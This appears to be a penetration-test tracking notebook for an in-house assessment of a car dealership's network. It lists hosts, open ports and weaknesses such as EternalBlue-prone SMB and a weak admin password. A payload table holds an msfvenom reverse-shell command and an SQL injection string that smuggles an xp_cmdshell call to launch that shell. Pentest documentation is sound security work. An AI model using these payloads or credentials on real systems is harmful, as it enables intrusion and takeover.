Murray Chev Pentest
βοΈ Overview
ποΈ
Name
Murray Chevrolet Cadillac
Murray Chevrolet Cadillac
π
Time Frame
ongoing
ongoing
π―
Goal
Full system enumeration and vulntest
Full system enumeration and vulntest
π
Description
This is the first in house pentest for Murray Chevrolet Cadillac to not only put into place what I have learned but to also better document the network.
π₯οΈ Machines
| Name | IP | Is Pwned | Is in domain | Has AV | Has FW | Operating System | Observations | Successful Attack Vector | Open Ports | Additional Notes |
|---|---|---|---|---|---|---|---|---|---|---|
| Alpha- | 192.168.1.101 | β | β | β | β | Windows 10 | SMB Vulnerability, RDP Brute Force | 135, 445, 3389 | SMB seems vulnerable to EternalBlue | |
| Beta-Server | 192.168.1.102 | β | β | β | β | Ubuntu 18.04 | SSH Weak Credentials, Exposed FTP | SSH using found credentials | 22, 21, 80 | Credentials found in previous breach dump |
| Gamma-Box | 192.168.1.103 | β | β | β | β | CentOS 7 | Outdated Apache Server, Misconfigured sudo | 80 | ||
βοΈ Findings
βοΈ Attacks & Payloads
| Machine | Attack Vector | Prerequisites | Payload | Additional Notes |
|---|---|---|---|---|
| Alpha-Node | SQLi on /login | msfvenom -p windows/shell_reverse_tcp | ProductID=1';EXEC master.dbo.xp_cmdshell "powershell C:\windows\temp\reverse.exe"; β | use GodPotato to escalate privileges to nt authority\system |
π₯Β Credentials
| Username | Hash | Password | Is domain user | Purpose | Additional Notes |
|---|---|---|---|---|---|
| ad | password123 | β | Admin login for Gamma-Box | Common password, easily guessed. | |
π Reports
π Journal
| Timestamp | Machine | Note |
|---|---|---|
| 12:34 | Beta-Server | Found common credentials using a previously known breach database. Gained SSH access. |
| 12:17 Jan27/25 | Nmap scan | Full nmap scan with βscript smb-enum-shares. |